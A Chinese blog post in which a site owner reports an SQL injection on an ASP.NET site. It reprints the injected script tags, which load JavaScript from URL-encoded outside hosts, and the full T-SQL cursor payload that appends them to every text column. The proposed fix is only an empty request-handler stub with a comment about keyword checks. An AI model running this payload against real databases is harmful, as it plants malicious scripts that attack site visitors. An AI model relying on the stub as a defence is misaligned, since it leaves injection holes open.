asp.net中SQL注入的解决办法

"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%73%61%79%38%2E%75%73/s.js></script><!"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr数据库中很多内容都被追加了上段代码,查看IIS日志后发现是SQL注入,大致如下:

asp.net中SQL注入的解决办法declare @t varchar(255),@c varchar(255
asp.net中SQL注入的解决办法declare table_cursor cursor 
asp.net中SQL注入的解决办法for 
asp.net中SQL注入的解决办法select a.name,b.name from sysobjects a,syscolumns b 
asp.net中SQL注入的解决办法where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167
asp.net中SQL注入的解决办法
asp.net中SQL注入的解决办法open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0
asp.net中SQL注入的解决办法begin 
       exec('update ['+@t+'] set ['+@c+']=['+@c+']+cast(0x223e3c2f7469746c653e3c736372697074207372633d687474703a2f2f2536362537352536332536422537352537352532452537352537332f312e6a733e3c2f7363726970743e3c212d2d as varchar(67))'
      fetch next from table_cursor into @t,@c 
  end 
asp.net中SQL注入的解决办法close table_cursor 
asp.net中SQL注入的解决办法deallocate table_cursor;
asp.net中SQL注入的解决办法

唉~~~,还是以前粗心忘记了加上SQL注入校验。

.net里面的global.asax里面,可以做这个处理加上

        protected void Application_BeginRequest(Object sender, EventArgs e)
        {

            StartProcessRequest();
        }

        public void StartProcessRequest()
        {

           //对Request.QueryStringRequest.Form进行sql关键字校验   
        }

相关文章:

  • 2022-02-23
  • 2022-03-04
  • 2022-12-23
  • 2022-12-23
  • 2022-02-16
  • 2021-04-20
猜你喜欢
  • 2021-12-18
  • 2021-07-26
  • 2022-12-23
  • 2021-12-08
  • 2021-11-17
  • 2022-03-02
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode